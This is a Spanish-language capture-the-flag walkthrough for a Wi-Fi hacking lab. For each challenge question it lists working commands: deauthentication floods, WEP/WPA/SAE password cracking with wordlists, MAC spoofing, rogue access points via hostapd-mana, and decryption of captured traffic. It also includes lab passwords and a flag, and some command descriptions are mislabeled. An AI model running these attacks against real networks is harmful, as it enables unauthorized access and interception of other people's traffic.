Wifi Challenge Lab v2.1
00. What is the contents of the file /root/flag.txt on the VM?
Los comandos utilizados han sido:
cat: Comando para leer archivos
cat /root/flag.txt
01. What is the channel that the wifi-global Access Point is currently using?
Los comandos utilizados han sido:
airmon-ng start wlan0: Pone la interfaz de red (wlan0) en modo promiscuo/monitor
airodump-ng wlan0mon --band abg: Captura/Muestra el trafico de todas las wifis cercanas incluidas las de 5GHz
airmong-ng start wlan0 airodump-ng wlan0mon --band abg
02. What is the MAC of the wifi-IT client? using?
Los comandos utilizados han sido:
airodump-ng wlan0mon --channel 11: Captura/Muestra el trafico de las redes en los canales 11
airodump-ng wlan0mon --channel 11
03. What is the probe of 78:C1:A7:BF:72:46?
Los comandos utilizados han sido:
airodump-ng wlan0mon --band abg: Captura/Muestra el trafico de las redes en las bandas de 2,4GHz y 5GHz
airodump-ng wlan0mon --band abg
04. What is the ESSID of the hidden AP (mac F0:9F:C2:6A:88:26)?
Los comandos utilizados han sido:
sed -i 's/\b\w\+/wifi-&/g' rockyouModificado.txt Para añadir "wifi-" al principio de cada palabra
iwconfig wlan0mon channel 11: Cambia el canal de la interfaz de red (wlan0mon) al canal 11
mdk4 wlan0mon p -t F0:9F:C2:6A:88:26 -f rockyoumodificado.txt: Consigue el nombre del wifi con dicha MAC (F0:9F:C2:6A:88:26) a partir de la lista (rockyoumodificado.txt)
sed -i 's/\b\w\+/wifi-&/g' rockyouModificado.txt iwconfig wlan0mon channel 11 mdk4 wlan0mon p -t F0:9F:C2:6A:88:26 -f rockyoumodificado.txt
05. What is the flag in the hidden AP router behind default credentials?
Los comandos utilizados han sido:
nano wifi.conf: Para crear un archivo de configuración del wifi, cuyo archivo contiene
network={ ssid="wifi-free" key_mgmt=NONE scan_ssid=1 }
wpa_supplicant -Dnl80211 -iwlan1 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)
dhclient wlan1 -v: Para obtener una IP en dicha interfaz (wlan1)
wpa_supplicant -Dnl80211 -iwlan1 -c wifi-free.conf dhclient wlan1 -v
06. What is the flag on the AP router of the wifi-guest network?
Los comandos utilizados han sido:
ip link set wlan2 down: Para apagar dicha interfaz (wlan2)
macchanger -m MAC wlan2: Para cambiar la MAC a la interfaz (wlan2) apagada
ip link set wlan2 up: Para encender dicha interfaz (wlan2)
nano wifi.conf: Para crear un archivo de configuración del wifi, cuyo archivo contiene
network={ ssid="wifi-guest" key_mgmt=NONE scan_ssid=1 }
Necesitaremos tener una captura de la red, donde podamos filtrar por el puerto 80 para sacar las credenciales
wpa_supplicant -Dnl80211 -iwlan2 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)
dhclient wlan2 -v: Para obtener una IP en dicha interfaz (wlan2)
wpa_supplicant -Dnl80211 -iwlan2 -c wifi.conf dhclient wlan1 -v
07. What is the flag on the wifi-old AP website?
Los comandos utilizados han sido:
besside-ng -b MAC wlan0mon: Para conseguir la contraseña del wifi de dicha MAC
nano wifi.conf: Para crear un archivo de configuración del wifi, cuyo archivo contiene
network={ ssid="wifi-old" key_mgmt=NONE wep_key0=11bb33cd55 wep_tx_keyidx=0 }
wpa_supplicant -Dnl80211 -iwlan3 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)
dhclient wlan3 -v: Para obtener una IP en dicha interfaz (wlan3)
wpa_supplicant -Dnl80211 -iwlan2 -c wifi.conf dhclient wlan1 -v
08. What is the wifi-mobile AP password?
Los comandos utilizados han sido:
airodump-ng wlan0mon -c 6 --wps -w scan8: Captura/Muestra el trafico de las redes en el canal 6 y lo guarda en archivos llamados scan8.
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon: Hace un ataque de Deauth 10 veces para obtener la contraseña de cuando se conecten, es importante hacer esto mientras se esta realizando la captura.
aircrack-ng scan8-01.cap -w /root/rockyou-top100000.txt: Conseguimos la contraseña del wifi mediante la captura anteriomente conseguida y una lista de palabras
airodump-ng wlan0mon -c 6 --wps -w scan8 aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon aircrack-ng scan8-01.cap -w /root/rockyou-top100000.txt
09. What is the IP of the web server in the wifi-mobile network?
Los comandos utilizados han sido:
airodump-ng wlan0mon -c 6 --wps -w scan9: Captura/Muestra el trafico de las redes en el canal 6 y lo guarda en archivos llamados scan9.
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon: Hace que se desconecte la gente para poder capturar los paquetes de login
airdecap-ng -e wifi-mobile -p starwars1 scan9-01.cap: Captura y desencripta el trafico wifi a la vez, utilizando la contraseña y ssid introducido (starwars1, wifi-mobile)
wireshark scan9-01-dec.cap: Abrimos la captura de trafico con wireshark
airodump-ng wlan0mon -c 6 --wps -w scan9 aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon airdecap-ng -e wifi-mobile -p starwars1 scan9-01.cap wireshark scan9-01-dec.cap En wireshark buscaremos todas las peeticiones que tengan como destino puerto 80, ya que el servidor web se aloja en el puerto 80 de manera habitual.
10. what is the flag after login in wifi-mobile?
Los comandos utilizados han sido:
airodump-ng wlan0mon -c 6 --wps -w scan10: Captura/Muestra el trafico de las redes en el canal 6 y lo guarda en archivos llamados scan10.
aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon: Captura y desencripta el trafico wifi a la vez, utilizando la contraseña y ssid introducido (starwars1, wifi-mobile)
aircrack-ng scan10-01.cap -w /root/rockyou-top100000.txt: Obtenemos la contraseña de dicha red
airdecap-ng -e wifi-mobile -p starwars1 scan10-01.cap: Abrimos la captura de trafico con wireshark
nano wifi.conf: Para crear un archivo de configuración del wifi, cuyo archivo contiene
network={ ssid="wifi-mobile" psk="starwars1" key_mgmt=WPA-PSK proto=WPA2 }
wpa_supplicant -Dnl80211 -iwlan4 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)
dhclient wlan4 -v: Para obtener una IP en dicha interfaz (wlan3)
wireshark scan10-01-dec.cap
airodump-ng wlan0mon -c 6 --wps -w scan10 aireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon aircrack-ng scan10-01.cap -w /root/rockyou-top100000.txt airdecap-ng -e wifi-mobile -p starwars1 scan10-01.cap nano wifi.conf wpa_supplicant -Dnl80211 -iwlan4 -c wifi.conf dhclient wlan4 -v wireshark scan9-01-dec.cap En wireshark buscaremos todas las peticiones que tengan como destino puerto 80, ya que el servidor web se aloja en el puerto 80 de manera habitual.
11. Is there client isolation in the wifi-mobile network?
Los comandos utilizados han sido:
arp-scan -I wlan4 -l: detecta dispositivos en la red
curl 192.168.2.7: manda una petición get a dicha IP
arp-scan -I wlan4 -l curl 192.168.2.7
12. What is the wifi-offices password?
Lo primero que deberemos de hacer es crear un archivo host.conf (el nombre puede ser diferente), el cual contenga el siguiente contenido
interface=wlan1 driver=nl80211 hw_mode=g channel=1 ssid=wifi-offices mana_wpaout=hostapd.hccapx wpa=2 wpa_key_mgmt=WPA-PSK wpa_pairwise=TKIP CCMP wpa_passphrase=12345678
hostapd-mana host.conf: Simula dicho punto de acceso para que se realicen las conexiones a nosotros
cat hostapd.hccapx | awk {'print $3'} > hostapd.22000: Arregla el formato del archivo para poder usar hashcat
hashcat -a 0 -m 22000 hostapd.22000 ~/rockyou-top100000.txt --force: Crackea los hashes para obtener la contraseña
13. What is the flag on the wifi-management AP website?
./wacker.py --wordlist ~/rockyou-top100000.txt --ssid wifi-management -- bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462: Ademas de suplantar la identidad del punto de acceso, crackea la contraseña
Crearemos un archivo de wifi.conf
network={ ssid="wifi-management" psk="chocolate1" key_mgmt=SAE scan_ssid=1 ieee80211w=2 }
wpa_supplicant -Dnl80211 -iwlan1 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan1)
dhclient wlan1 -v: Para obtener una IP en dicha interfaz (wlan1)
Con esto entraremos a la IP 192.168.14.1 y obtendremos la flag
14. What is the flag on the wifi-IT AP website?
Crearemos otro archivo host.conf
interface=wlan1 driver=nl80211 hw_mode=g channel=11 ssid=wifi-IT mana_wpaout=hostapd-it.hccapx wpa=2 wpa_key_mgmt=WPA-PSK wpa_pairwise=TKIP CCMP wpa_passphrase=12345678
Importante hacer el hostapd-mana y el aireplay-ng a la vez, ya que si no, no funcionara
hostapd-mana hostapd-sae.conf: Simulamos el punto de acceso
iwconfig wlan0mon channel 11: Cambiamos la interfaz de canal para poder usar herramientas
aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25 -c 10:F9:6F:AC:53:52: Mandamos un ataque de deauth para que se conecten a nuestro punto de acceso simulado
cat hostapd.hccapx | awk {'print $3'} > hostapd.22000: Formateamos correctamente el archivo de los hashes
hashcat -a 0 -m 22000 hostapd.22000 ~/rockyou-top100000.txt --force: Crackeamos los hashes para obtener la contraseña
Crearemos el archivo wifi.conf con el siguiente contenido
network={ ssid="wifi-IT" bssid=F0:9F:C2:1A:CA:25 psk="bubblegum" key_mgmt=SAE scan_ssid=1 ieee80211w=0 }
wpa_supplicant -Dnl80211 -iwlan2 -c wifi.conf: Para conectarse a la red wifi con dicha interfaz (wlan2)
dhclient wlan2 -v: Para obtener una IP en dicha interfaz (wlan2)
Con esto entraremos a la IP 192.168.15.1 y obtendremos la flag
En progreso...
Agradecemos su espera
flag{60223747c5360c8d3203917998f37d28}